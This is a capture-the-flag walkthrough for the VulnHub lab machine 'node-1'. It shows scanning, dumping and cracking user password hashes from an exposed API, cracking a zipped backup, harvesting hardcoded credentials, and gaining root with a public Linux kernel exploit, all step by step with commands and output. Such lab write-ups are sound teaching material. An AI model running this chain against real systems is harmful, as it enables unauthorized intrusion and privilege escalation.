Walkthrough on CTF node-1

Iso

Download here -> https://www.vulnhub.com/entry/node-1,252/

Discover the target ip

$ sudo nmap -sS 192.168.2.0/24

Nmap scan report for 192.168.2.84
- - -
PORT     STATE SERVICE
22/tcp   open  ssh
3000/tcp open  ppp
MAC Address: 08:00:27:A2:8A:95 (Oracle VirtualBox virtual NIC)

Find attack vectors

$ sudo nmap --script vuln 192.168.2.84

Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.2.84
Host is up (-0.046s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE
22/tcp   open  ssh
3000/tcp open  ppp
MAC Address: 08:00:27:A2:8A:95 (Oracle VirtualBox virtual NIC)

Nikto, dirb and gobuster are not effectible on javascript application… We need use the ‘web spidering’ method available on burpsuite or zaproxy.

I will use burpsuite here, and don’t try with w3m, you need a modern web browser which play with javascript to find all URL.

Configure our web browser to use burpproxy at 127.0.0.1:8080 and go http://192.168.2.84:3000.

On burpsuite: click on the tab Target, right click on your server address and select Spider this host. Monitor the tab Proxy to forward all requests.

Result after few clicks:

http://192.168.2.84:3000/api/users/
http://192.168.2.84:3000/api/users/latest
http://192.168.2.84:3000/api/users/tom
http://192.168.2.84:3000/api/partials/home.html
http://192.168.2.84:3000/api/partials/login.html

You can quit burpsuite, open the page /api/users:

[{"_id":"59a7365b98aa325cc03ee51c","username":"myP14ceAdm1nAcc0uNT","password":"dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af","is_admin":true},{"_id":"59a7368398aa325cc03ee51d","username":"tom","password":"f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240","is_admin":false},{"_id":"59a7368e98aa325cc03ee51e","username":"mark","password":"de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73","is_admin":false},{"_id":"59aa9781cced6f1d1490fce9","username":"rastating","password":"5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0","is_admin":false}]

Open leaked.py to decode these haches:

Enter your choice (1-4): 2

Enter or paste a hash code you want to check: dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0afTHAT HASH CODE IS LEAKED! It means: manchester


Enter or paste a hash code you want to check: f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240
THAT HASH CODE IS LEAKED! It means: spongebob

Enter or paste a hash code you want to check: de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73
THAT HASH CODE IS LEAKED! It means: snowflake

So, in short:

myP14ceAdm1nAcc0uNT : manchester : admin
tom : spongebob
mark : snowflake
rastating : pass no found

Log in with the admin account and download the backup file.

$ file myplace.backup
myplace.backup: ASCII text, with very long lines, with no line terminators

An encoded file, probably with base64, we try…

$ base64 -d myplace.backup > myplace
$ file myplace
myplace: Zip archive data, at least v1.0 to extract
$ 7z x myplace
Enter password (will not be echoed):

A password is needed… So like the bruteforce method is not really interresting, i give you the password magicword here.

$ fcrackzip -v -b -u -p magicword 'myplace'

With a good dictionnary, you do something like this:

$ fcrackzip -v -u -D good_dictionnary.dic 'myplace'

Next, try to found something of cool in this archive…

$ find var -type f | xargs grep -iE 'key|pass'

var/www/myplace/app.js:const backup_key  = '45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474';

Open this file, maybe we will found other secrets…

const url         = 'mongodb://mark:5AYRft73VtFpc84k @localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
- - -
var proc = spawn('/usr/local/bin/backup', ['-q', backup_key, __dirname ]);

We found an access to mongodb, an username mark and a password 5AYRft73VtFpc84k. And a command /usr/local/bin/backup which serve to create a backup, we’ll see later.

$ ssh mark@192.168.2.84
password: 5AYRft73VtFpc84k

If the password is not ask (like me), edit your ssh configuration:

$ vim .ssh/config

Host 192.168.2.84
  PasswordAuthentication yes

It should work.
On our host, find the linux version.

$ uname -a
Linux node 4.4.0-93-generic #116-Ubuntu SMP Fri Aug 11 21:17:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

Search an exploit to linux 4.4.0.

$ searchsploit 4.4.0

Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation                                                                                | exploits/linux/local/41458.c
- - -
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local | exploits/linux/local/44298.c

Copy, paste the exploit in a file into ubuntu or send him with scp:

$ scp /usr/share/exploitdb/exploits/linux/local/44298.c mark@192.168.2.84:/tmp/

Ubuntu side:

$ cd /tmp
$ gcc 44298.c
$ ./a.out

We are root:

# cd /root
# cat root.txt
1722e99ca5f353b362556a62bd5e6be0

The other flag is hidden into /home/tom/user.txt :)

e1156acc3574e04b06908ecf76be91b1